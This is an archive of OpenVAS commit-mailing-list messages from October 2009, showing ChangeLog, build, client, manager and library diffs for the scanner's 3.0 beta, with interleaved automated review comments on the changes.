(rev 5384) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 06:12:48 UTC (rev 5385) @@ -38,7 +38,6 @@ scripts/fcore_2009_10180.nasl: New plugins. - 2009-10-05 Michael Meyer * scripts/cvspserver_version.nasl, 
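Review bot: In the r5384 change to checkpoint-vpn1-pat-information-disclosure.nasl, desc is now assigned only inside if (description), so it is unset when the script runs in scan mode. Check that nothing after the description block still reads desc (for example as report text); if something does, keep the assignment outside the block or give the report its own string.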
@@ -29697,7 +29696,7 @@ * scripts/nikto.nasl: Removed useless display(). -2009-07-20 Tim Brown +2009-07-20 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl, scripts/checkpoint-vpn1-pat-information-disclosure.nasl: Added @@ -29819,12 +29818,12 @@ scripts/mdksa_2009_148.nasl: Added new plugins. -2009-07-14 Tim Brown +2009-07-14 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl: Fixed dependency. -2009-07-13 Tim Brown +2009-07-13 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl: Now checks response flags. Handles empty responses, DNS compression with @@ -30092,12 +30091,12 @@ current i18n concepts, http://www.openvas.org/openvas-cr-36.html) using the script provided by Markus Schr?der. -2009-07-11 Tim Brown +2009-07-11 Tim Brown * visionsoft-audit-detect.nasl: Fixed misnamed function call. -2009-07-10 Tim Brown +2009-07-10 Tim Brown * scripts/msdns-server-hostname-disclosure.nasl, scripts/visionsoft-audit-detect.nasl: Added new plugins. @@ -40106,7 +40105,7 @@ * scripts/gb_trillian_mult_vuln.nasl: Added new plugin. -2008-12-16 Tim Brown +2008-12-16 Tim Brown * scripts/ike-scan.nasl: Fixed minor bug. @@ -40503,7 +40502,7 @@ * scripts/webserver_favicon.nasl: Added MD5 fingerprints of popular software. -2008-11-05 Tim Brown +2008-11-05 Tim Brown * scripts/checkpoint-vpn1-pat-information-disclosure.nasl: Added check for Checkpoint VPN-1 PAT information disclosure. @@ -40940,7 +40939,7 @@ connections to target host. Changed find_bin function using case insensitive search. -2008-10-12 Tim Brown +2008-10-12 Tim Brown * scripts/aix_maintenance_level.nasl, scripts/apple-sa-2004-08-09.nasl, @@ -41224,7 +41223,7 @@ * MANIFEST: Updated. -2008-09-18 Tim Brown +2008-09-18 Tim Brown openvas.tmpl.in: Honour LDFLAGS. @@ -41306,7 +41305,7 @@ freebsd_twiki1.nasl freebsd_wordpress7.nasl New scripts -2008-09-15 Tim Brown +2008-09-15 Tim Brown * scripts/ike-scan.nasl: Fixes typo in previous fix. 
@@ -41319,7 +41318,7 @@ * scripts/pnscan.nasl, scripts/portbunny.nasl: Fixed leftovers from experimental ID's to production ID's in error reporting -2008-09-14 Tim Brown +2008-09-14 Tim Brown * scripts/ike-scan.nasl: Completely rewritten, it will now attempt to enumerate supported cipher suites, bruteforce @@ -41463,7 +41462,7 @@ secpod_reg_enum.nasl and secpod_reg.inc as they are re-written. -2008-09-10 Tim Brown +2008-09-10 Tim Brown * openvas-nvt-sync.in: Fixed rsync options not to trust remote group and user. @@ -42851,7 +42850,7 @@ scripts/deb_1495_2.nasl, scripts/deb_1502_1.nasl, scripts/deb_1497_1.nasl: New Debian scripts. -2008-02-20 Tim Brown +2008-02-20 Tim Brown * scripts/telnet_func.inc, scripts/pop3_func.inc, scripts/nfs_func.inc, scripts/misc_func.inc, @@ -44144,7 +44143,7 @@ scripts/debian_DSA-999.nasl: Removed. They are replaced by a new set of debian local security checks. -2007-11-08 Tim Brown +2007-11-08 Tim Brown * openvas-nvt-sync.in: Minor bug fix to resolve issues where current working directory is not the plugins directory. Modified: trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/checkpoint-vpn1-pat-information-disclosure.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -3,7 +3,7 @@ # Description: Checkpoint VPN-1 PAT information disclosure # # Authors: -# Tim Brown +# Tim Brown # # Fixes (+note about FP): Vlatko Kosturjak # Modified: trunk/openvas-plugins/scripts/dns_xfer.nasl =================================================================== --- trunk/openvas-plugins/scripts/dns_xfer.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/dns_xfer.nasl 2009-10-06 06:12:48 UTC (rev 5385) 
@@ -4,7 +4,7 @@ # Modified by Axel Nennker # Modified by Erik Anderson # Modified by Pavel Kankovsky -# Modified by Tim Brown +# Modified by Tim Brown # # See the Nessus Scripts License for details # Modified: trunk/openvas-plugins/scripts/gather-package-list.nasl =================================================================== --- trunk/openvas-plugins/scripts/gather-package-list.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/gather-package-list.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -4,7 +4,7 @@ # # Authors: # Thomas Reinke -# Tim Brown +# Tim Brown # # Copyright: # Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com Modified: trunk/openvas-plugins/scripts/ike-scan.nasl =================================================================== --- trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/ike-scan.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -4,7 +4,7 @@ # # Authors: # Vlatko Kosturjak (Original development and fixes to rewrite) -# Tim Brown (Complete rewrite) +# Tim Brown (Complete rewrite) # # Copyright: # Copyright (c) 2008 Vlatko Kosturjak Modified: trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/msdns-server-hostname-disclosure.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -3,7 +3,7 @@ # Description: Microsoft DNS server internal hostname disclosure detection # # Authors: -# Tim Brown +# Tim Brown # # Copyright: # Copyright (c) 2009 Tim Brown 
@@ -40,7 +40,7 @@ http://support.microsoft.com/default.aspx?id=198410 See also: -http://www.nth-dimension.org.uk/blog.php?id=31 +http://www.openvas.org/blog.php?id=31 Risk factor: Low"; script_description(desc); Modified: trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl 2009-10-06 06:02:06 UTC (rev 5384) +++ trunk/openvas-plugins/scripts/visionsoft-audit-detect.nasl 2009-10-06 06:12:48 UTC (rev 5385) @@ -3,7 +3,7 @@ # Description: Visionsoft Audit multiple vulnerability detection # # Authors: -# Tim Brown +# Tim Brown # # Copyright: # Copyright (c) 2009 Tim Brown and Portcullis Computer Security Ltd From scm-commit at wald.intevation.org Tue Oct 6 08:54:34 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 08:54:34 +0200 (CEST) Subject: [Openvas-commits] r5386 - in trunk/openvas-libraries: . misc Message-ID: <20091006065434.DA9C6803D8DB@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 08:54:33 +0200 (Tue, 06 Oct 2009) New Revision: 5386 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/misc/proctitle.c Log: * misc/proctitle.c (setproctitle): Changed start of proctitle to match the new openvas-scanner binary name. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 06:12:48 UTC (rev 5385) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 06:54:33 UTC (rev 5386) 
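Review bot: The r5385 hunk for msdns-server-hostname-disclosure.nasl rewrites the "See also" reference from http://www.nth-dimension.org.uk/blog.php?id=31 to http://www.openvas.org/blog.php?id=31. That line is a reference URL in the plugin description, not a contact address, so it falls outside the log message "Fix up contact email address" and looks like a domain search-and-replace that caught one line too many. Confirm that the new URL actually serves that blog entry; otherwise restore the original link.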
@@ -1,3 +1,8 @@ +2009-10-06 Michael Wiegand + + * misc/proctitle.c (setproctitle): Changed start of proctitle to match + the new openvas-scanner binary name. + 2009-10-05 Felix Wolfsteller * include/libopenvas.h: Emptied, except for documentation. Modified: trunk/openvas-libraries/misc/proctitle.c =================================================================== --- trunk/openvas-libraries/misc/proctitle.c 2009-10-06 06:12:48 UTC (rev 5385) +++ trunk/openvas-libraries/misc/proctitle.c 2009-10-06 06:54:33 UTC (rev 5386) @@ -88,7 +88,7 @@ #endif va_end(param); - snprintf(buf2, sizeof(buf2), "openvasd: %s", buf); /* RATS: ignore */ + snprintf(buf2, sizeof(buf2), "openvassd: %s", buf); /* RATS: ignore */ bzero(buf, sizeof(buf)); strncpy(buf, buf2, sizeof(buf) - 1); From scm-commit at wald.intevation.org Tue Oct 6 09:52:27 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 09:52:27 +0200 (CEST) Subject: [Openvas-commits] r5387 - trunk/doc/website Message-ID: <20091006075227.17DF884F7462@pyrosoma.intevation.org> Author: timb Date: 2009-10-06 09:52:25 +0200 (Tue, 06 Oct 2009) New Revision: 5387 Modified: trunk/doc/website/Makefile Log: Make rsync ignore "CVS" files Modified: trunk/doc/website/Makefile =================================================================== --- trunk/doc/website/Makefile 2009-10-06 06:54:33 UTC (rev 5386) +++ trunk/doc/website/Makefile 2009-10-06 07:52:25 UTC (rev 5387) @@ -54,7 +54,7 @@ online: all echo "Going to put current contents online for openvas.wald.intevation.org ..." - rsync --protocol=29 -urvP --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ + rsync --protocol=29 -urvPC --exclude='.svn' $(ADD_INST_TYPES) $(TARGETS) $(ADD_INST_DIRS) \ $(USER)@wald.intevation.org:/openvas/htdocs/ install: all From scm-commit at wald.intevation.org Tue Oct 6 10:28:51 2009 
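Review bot: In the online target of trunk/doc/website/Makefile (r5387), -C (--cvs-exclude) drops more than CVS directories: it applies rsync's built-in ignore list (for example *.o, *.bak, *.orig, *~, core, tags) plus any .cvsignore files and $CVSIGNORE, so a website file matching one of those patterns would silently stop being uploaded. If the aim is only to skip CVS metadata, an explicit --exclude='CVS' beside the existing --exclude='.svn' is narrower; if -C stays, say so in a comment next to the rule.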
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 10:28:51 +0200 (CEST) Subject: [Openvas-commits] r5388 - trunk/openvas-libraries Message-ID: <20091006082851.9BE3385D9191@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 10:28:50 +0200 (Tue, 06 Oct 2009) New Revision: 5388 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/Makefile Log: * Makefile: Expose $localstatedir and $sysconfdir set during configure time to CMake. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 07:52:25 UTC (rev 5387) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 08:28:50 UTC (rev 5388) @@ -1,5 +1,10 @@ 2009-10-06 Michael Wiegand + * Makefile: Expose $localstatedir and $sysconfdir set during configure + time to CMake. + +2009-10-06 Michael Wiegand + * misc/proctitle.c (setproctitle): Changed start of proctitle to match the new openvas-scanner binary name. Modified: trunk/openvas-libraries/Makefile =================================================================== --- trunk/openvas-libraries/Makefile 2009-10-06 07:52:25 UTC (rev 5387) +++ trunk/openvas-libraries/Makefile 2009-10-06 08:28:50 UTC (rev 5388) 
@@ -30,11 +30,11 @@ ALLDEPS = openvas-libraries.tmpl all: $(ALLDEPS) - cd base && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DHAVE_WMI=$(HAVE_WMI) && ${MAKE} + cd base && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DSYSCONFDIR=${sysconfdir} -DLOCALSTATEDIR=${localstatedir} -DHAVE_WMI=$(HAVE_WMI) && ${MAKE} cd hg && ${MAKE} cd misc && ${MAKE} - cd nasl && cmake -DCMAKE_INSTALL_PREFIX=${prefix} && ${MAKE} - cd omp && cmake -DCMAKE_INSTALL_PREFIX=${prefix} && ${MAKE} + cd nasl && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DSYSCONFDIR=${sysconfdir} -DLOCALSTATEDIR=${localstatedir} && ${MAKE} + cd omp && cmake -DCMAKE_INSTALL_PREFIX=${prefix} -DSYSCONFDIR=${sysconfdir} -DLOCALSTATEDIR=${localstatedir} && ${MAKE} openvas-libraries.tmpl: openvas-libraries.tmpl.in configure VERSION $(SHELL) configure $(CONFIGURE_ARGS) From scm-commit at wald.intevation.org Tue Oct 6 10:50:03 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 10:50:03 +0200 (CEST) Subject: [Openvas-commits] r5389 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091006085003.276CE9503ABF@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 10:50:01 +0200 (Tue, 06 Oct 2009) New Revision: 5389 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove verbose flag setting. Correct indentation. * openvas/openvas-client.c (refresh_server): Save context to disk afterwards, so that new scopes can copy it. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-06 08:28:50 UTC (rev 5388) +++ trunk/openvas-client/ChangeLog 2009-10-06 08:50:01 UTC (rev 5389) 
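Review bot: In the all target of trunk/openvas-libraries/Makefile (r5388), the new -DSYSCONFDIR=${sysconfdir} and -DLOCALSTATEDIR=${localstatedir} values are passed to cmake unquoted, so a configured path containing a space splits into separate arguments; quote each -D value. The same options are now repeated on the base, nasl and omp lines, and a single make variable holding them would keep the three invocations in step.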
@@ -1,3 +1,11 @@ +2009-10-06 Matthew Mundell + + * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove + verbose flag setting. Correct indentation. + + * openvas/openvas-client.c (refresh_server): Save context to disk + afterwards, so that new scopes can copy it. + 2009-10-02 Felix Wolfsteller * include/config.h.in: Set ENABLE_SAFE_TESTS to 0. Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-06 08:28:50 UTC (rev 5388) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-06 08:50:01 UTC (rev 5389) @@ -460,6 +460,9 @@ plugin_cache_write (context, context->plugins_md5sum); } + /* Save the RC to disk, so that new scopes can copy it. */ + context_save_recurse (context); + return NULL; } #endif /* USE_OMP */ Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 08:28:50 UTC (rev 5388) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 08:50:01 UTC (rev 5389) @@ -1172,8 +1172,6 @@ GtkTreeStore *treestore; const char *message; - //verbose = 1; // FIX - switch(type) { case CONTEXT_SERVER: @@ -1387,7 +1385,7 @@ /* Create the children of the manager in the scope tree. */ treeview = GTK_TREE_VIEW (arg_get_value (arg_get_value (MainDialog, - "SCOPETREE"), + "SCOPETREE"), "TREEVIEW")); treestore = GTK_TREE_STORE (gtk_tree_view_get_model (treeview)); scope_create_treestore_children (treestore, context); From scm-commit at wald.intevation.org Tue Oct 6 11:22:01 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:22:01 +0200 (CEST) Subject: [Openvas-commits] r5390 - in trunk/openvas-libraries: . misc nasl Message-ID: <20091006092201.64D3F865F477@pyrosoma.intevation.org> Author: felix Date: 2009-10-06 11:21:55 +0200 (Tue, 06 Oct 2009) New Revision: 5390 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/misc/store.c trunk/openvas-libraries/nasl/nasl_scanner_glue.c Log: * misc/store.c, nasl/nasl_scanner_glue.c: Replaced openvasd by openvassd in documentation, minor cosmetics. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 08:50:01 UTC (rev 5389) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 09:21:55 UTC (rev 5390) @@ -1,3 +1,8 @@ +2009-10-06 Felix Wolfsteller + + * misc/store.c, nasl/nasl_scanner_glue.c: Replaced openvasd by + openvassd in documentation, minor cosmetics. + 2009-10-06 Michael Wiegand * Makefile: Expose $localstatedir and $sysconfdir set during configure Modified: trunk/openvas-libraries/misc/store.c =================================================================== --- trunk/openvas-libraries/misc/store.c 2009-10-06 08:50:01 UTC (rev 5389) +++ trunk/openvas-libraries/misc/store.c 2009-10-06 09:21:55 UTC (rev 5390) @@ -43,7 +43,7 @@ * store returns NULL (cache is either outdated, contains error or an error * occurred). * - * The store is updated at each openvasd start up. There the plugin loader + * The store is updated at each openvassd start up. There the plugin loader * iterates over plugin files and tries to retrieve the cached version. * If there is no cached version (or @ref store_load_plugin returns Null for * another reason, e.g.because the script file seems to have been modified in 
@@ -133,7 +133,7 @@ } str = t+1; } - + while(str[0]==' ')str++; if(str[0] != '\0') arg_add_value(ret, str, ARG_INT, 0, (void*)1); Modified: trunk/openvas-libraries/nasl/nasl_scanner_glue.c =================================================================== --- trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 08:50:01 UTC (rev 5389) +++ trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 09:21:55 UTC (rev 5390) @@ -20,7 +20,7 @@ /** * @file * This file contains all the functions that make the "glue" between - * as NASL script and openvasd. + * as NASL script and openvassd. * (script_*(), *kb*(), scanner_*()) */ @@ -830,18 +830,19 @@ return FAKE_CELL; } -tree_cell * set_kb_item(lex_ctxt * lexic) +tree_cell * +set_kb_item (lex_ctxt * lexic) { struct arglist * script_infos = lexic->script_infos; char * name = get_str_local_var_by_name(lexic, "name"); int type = get_local_var_type_by_name(lexic, "value"); - + if( name == NULL ) { nasl_perror(lexic, "Syntax error with set_kb_item() [null name]\n", name); return FAKE_CELL; } - + if (! lexic->authenticated && strncmp(name, SECRET_KB_PREFIX, sizeof(SECRET_KB_PREFIX) - 1) == 0) { @@ -879,11 +880,11 @@ /** - * Function is used when the script wants to report a problem back to openvasd. + * Function is used when the script wants to report a problem back to openvassd. */ typedef void(*proto_post_something_t)(struct arglist*, int, const char*, const char *); /** - * Function is used when the script wants to report a problem back to openvasd. + * Function is used when the script wants to report a problem back to openvassd. */ typedef void(*post_something_t)(struct arglist*, int, const char*); From scm-commit at wald.intevation.org Tue Oct 6 11:38:05 2009 
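Review bot: In the r5390 change to nasl_scanner_glue.c, the @file comment being edited still reads "between as NASL script and openvassd"; change "as" to "a" while the line is touched. In the set_kb_item hunk, the context line nasl_perror(lexic, "Syntax error with set_kb_item() [null name]\n", name); passes name as an extra argument although the format string has no conversion for it, and name is NULL on that path, so the argument can be dropped.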
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:38:05 +0200 (CEST) Subject: [Openvas-commits] r5391 - in trunk/openvas-manager: . src Message-ID: <20091006093805.DBF7B861EACA@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 11:38:00 +0200 (Tue, 06 Oct 2009) New Revision: 5391 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/omp.h trunk/openvas-manager/src/ompd.c trunk/openvas-manager/src/ompd.h trunk/openvas-manager/src/openvasmd.c trunk/openvas-manager/src/tasks_sql.h Log: Complete database initialisation check started yesterday. * src/tasks_sql.h (init_manage): Add nvt_cache_mode arg. Update caller. Enable and complete database initialisation check. * src/manage.h: Update header. * src/omp.c (init_omp): Add nvt_cache_mode arg. Update caller. * src/omp.h: Update header. * src/ompd.c (init_ompd): Add nvt_cache_mode arg. Update caller. * src/ompd.h: Update header. * src/openvasmd.c (main): Add "must init" failure to init_ompd return checks. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/ChangeLog 2009-10-06 09:38:00 UTC (rev 5391) 
@@ -1,3 +1,20 @@ +2009-10-06 Matthew Mundell + + Complete database initialisation check started yesterday. + + * src/tasks_sql.h (init_manage): Add nvt_cache_mode arg. Update caller. + Enable and complete database initialisation check. + * src/manage.h: Update header. + + * src/omp.c (init_omp): Add nvt_cache_mode arg. Update caller. + * src/omp.h: Update header. + + * src/ompd.c (init_ompd): Add nvt_cache_mode arg. Update caller. + * src/ompd.h: Update header. + + * src/openvasmd.c (main): Add "must init" failure to init_ompd return + checks. + 2009-10-05 Matthew Mundell Move caching of NVT preferences to the database. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/manage.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -52,7 +52,7 @@ extern scanner_t scanner; int -init_manage (GSList*); +init_manage (GSList*, int); void init_manage_process (); Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/omp.c 2009-10-06 09:38:00 UTC (rev 5391) 
@@ -5174,18 +5174,19 @@ * @brief Initialise OMP library. * * @param[in] log_config Logging configuration list. + * @param[in] nvt_cache_mode True when running in NVT caching mode. * * @return 0 success, -1 error, -2 database is wrong version, -3 database * needs to be initialized from server. */ int -init_omp (GSList *log_config) +init_omp (GSList *log_config, int nvt_cache_mode) { g_log_set_handler (G_LOG_DOMAIN, ALL_LOG_LEVELS, (GLogFunc) openvas_log_func, log_config); - return init_manage (log_config); + return init_manage (log_config, nvt_cache_mode); } /** Modified: trunk/openvas-manager/src/omp.h =================================================================== --- trunk/openvas-manager/src/omp.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/omp.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -36,7 +36,7 @@ #define TO_CLIENT_BUFFER_SIZE 26214400 int -init_omp (GSList*); +init_omp (GSList*, int); void init_omp_process (); Modified: trunk/openvas-manager/src/ompd.c =================================================================== --- trunk/openvas-manager/src/ompd.c 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/ompd.c 2009-10-06 09:38:00 UTC (rev 5391) @@ -93,15 +93,16 @@ /** * @brief Initialise the OMP library for the OMP daemon. * - * @param[in] log_config Log configuration + * @param[in] log_config Log configuration + * @param[in] nvt_cache_mode True when running in NVT caching mode. * * @return 0 success, -1 error, -2 database is wrong version, -3 database * needs to be initialized from server. */ int -init_ompd (GSList *log_config) +init_ompd (GSList *log_config, int nvt_cache_mode) { - return init_omp (log_config); + return init_omp (log_config, nvt_cache_mode); } /** Modified: trunk/openvas-manager/src/ompd.h =================================================================== --- trunk/openvas-manager/src/ompd.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/ompd.h 2009-10-06 09:38:00 UTC (rev 5391) 
@@ -31,7 +31,7 @@ #include int -init_ompd (GSList*); +init_ompd (GSList*, int); int serve_omp (gnutls_session_t*, gnutls_session_t*, Modified: trunk/openvas-manager/src/openvasmd.c =================================================================== --- trunk/openvas-manager/src/openvasmd.c 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/openvasmd.c 2009-10-06 09:38:00 UTC (rev 5391) @@ -627,7 +627,7 @@ /* Initialise OMP daemon. */ - switch (init_ompd (log_config)) + switch (init_ompd (log_config, 1)) { case 0: break; @@ -636,6 +636,8 @@ free_log_configuration (log_config); exit (EXIT_FAILURE); break; + case -3: + assert (0); case -1: default: g_critical ("%s: failed to initialise OMP daemon\n", __FUNCTION__); @@ -792,7 +794,7 @@ /* Initialise OMP daemon. */ - switch (init_ompd (log_config)) + switch (init_ompd (log_config, 0)) { case 0: break; @@ -801,6 +803,13 @@ free_log_configuration (log_config); exit (EXIT_FAILURE); break; + case -3: + g_critical ("%s: database must be initialised" + " (with the --update command line option)\n", + __FUNCTION__); + free_log_configuration (log_config); + exit (EXIT_FAILURE); + break; case -1: default: g_critical ("%s: failed to initialise OMP daemon\n", __FUNCTION__); Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:21:55 UTC (rev 5390) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:38:00 UTC (rev 5391) @@ -889,11 +889,14 @@ * Beware that calling this function while tasks are running may lead to * problems. * + * @param[in] log_config Log configuration. + * @param[in] nvt_cache_mode True when running in NVT caching mode. + * * @return 0 success, -1 error, -2 database is wrong version, -3 database needs * to be initialised from server. */ int -init_manage (GSList *log_config) +init_manage (GSList *log_config, int nvt_cache_mode) { const char *database_version; task_t index; 
@@ -911,25 +914,36 @@ database_version = sql_string (0, 0, "SELECT value FROM meta" " WHERE name = 'database_version';"); - if (database_version - && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) - return -2; + if (nvt_cache_mode) + { + if (database_version + && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) + return -2; -#if 0 - /** @todo Skip this when in NVT caching mode. */ + /* If database_version was NULL then meta was missing, so assume + * that the database is missing, which is OK. */ + } + else + { + if (database_version) + { + if (strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) + return -2; + } + else + /* Assume database is missing. */ + return -3; - /* Check that the database was initialised from the scanner. */ + /* Check that the database was initialised from the scanner. */ - { - long long int count; - if (sql_int64 (&count, 0, 0, - "SELECT count(*) FROM meta" - " WHERE name = 'nvt_md5sum'" - " OR name = 'nvt_preferences_enabled';") - || count < 2) - return -3; - } -#endif + long long int count; + if (sql_int64 (&count, 0, 0, + "SELECT count(*) FROM meta" + " WHERE name = 'nvts_md5sum'" + " OR name = 'nvt_preferences_enabled';") + || count < 2) + return -3; + } /* Ensure the tables exist. */ From scm-commit at wald.intevation.org Tue Oct 6 11:43:07 2009 
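Review bot: in src/openvasmd.c (r5391), the first init_ompd switch, the one called with nvt_cache_mode 1, adds "case -3: assert (0);" with no break and no exit, so in a build with NDEBUG defined the assertion disappears and control falls through silently to "case -1:" and its generic "failed to initialise OMP daemon" message. The check added to init_manage in this revision only returns -3 from the non-caching branch, so the case is meant to be unreachable here; say so in a comment and mark the fall-through as intentional, or handle it explicitly with its own g_critical, free_log_configuration and exit like the other cases.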
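Review bot: in src/tasks_sql.h (init_manage, r5391), the non-caching branch returns -3 both when the meta rows are absent and when sql_int64 itself returns non-zero, so a failed query is reported to the operator as "database must be initialised (with the --update command line option)". Consider returning -1 when sql_int64 fails and -3 only when count < 2. The enabled query also looks for 'nvts_md5sum' where the removed "#if 0" block had 'nvt_md5sum'; the ChangeLog entry does not mention the rename, so it is worth a line there, and the code that writes that meta row should be confirmed to use the same key, otherwise the check can never pass.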
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:43:07 +0200 (CEST) Subject: [Openvas-commits] r5392 - in trunk/openvas-libraries: . doc Message-ID: <20091006094307.9B35F861EAB2@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:43:06 +0200 (Tue, 06 Oct 2009) New Revision: 5392 Modified: trunk/openvas-libraries/CHANGES trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/VERSION trunk/openvas-libraries/doc/Doxyfile trunk/openvas-libraries/doc/Doxyfile_full Log: Preparing the openvas-libraries 3.0.0-beta3 release. * CHANGES: Updated. * VERSION: Set to 3.0.0.beta3. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-libraries/CHANGES =================================================================== --- trunk/openvas-libraries/CHANGES 2009-10-06 09:38:00 UTC (rev 5391) +++ trunk/openvas-libraries/CHANGES 2009-10-06 09:43:06 UTC (rev 5392) 
@@ -1,3 +1,55 @@ +openvas-libraries 3.0.0-beta3 (2009-10-06) + +This release is the third beta version of openvas-libraries +leading up to the upcoming 3.0 release of OpenVAS. +It introduces a significantly improved and changed source +code architecture and therefore introduces a new API for the +other OpenVAS components. + +OpenVAS 3.0 will introduce a new architecture where openvas-libraries +now includes openvas-libnasl as well as redundant code from openvas-client +and where openvas-server is renamed to openvas-scanner and includes any +platform-dependent elements of openvas-plugins. As a result of this, +the source code will shrink, though new features will be added. Also, +for running the scanner now only 2 modules are required (instead of 4 +as for OpenVAS 2.0). + +New features of OpenVAS include support for IPv6 and WMI-Clients. +Version 3.0 prepares the new OpenVAS Manager and OpenVAS Administrator +as optional extension. This combination leverages the vulnerability +scanner to a comprehensive vulnerability management solution. + +The "beta" releases are intended to allow testing of the upcoming +3.0 series. It should be kept separate from OpenVAS 2.0 installations +and not be used in a production environment. + +Many thanks to everyone who has contributed to the 3.0.0 release: +Chandrashekhar B, Marcus Brinkmann, Tim Brown, Vlatko Kosturjak, Michael Meyer, +Matthew Mundell, Laban Mwangi, Srinivasa NL, Jan Wagner, Jan-Oliver Wagner, +Michael Wiegand and Felix Wolfsteller. 
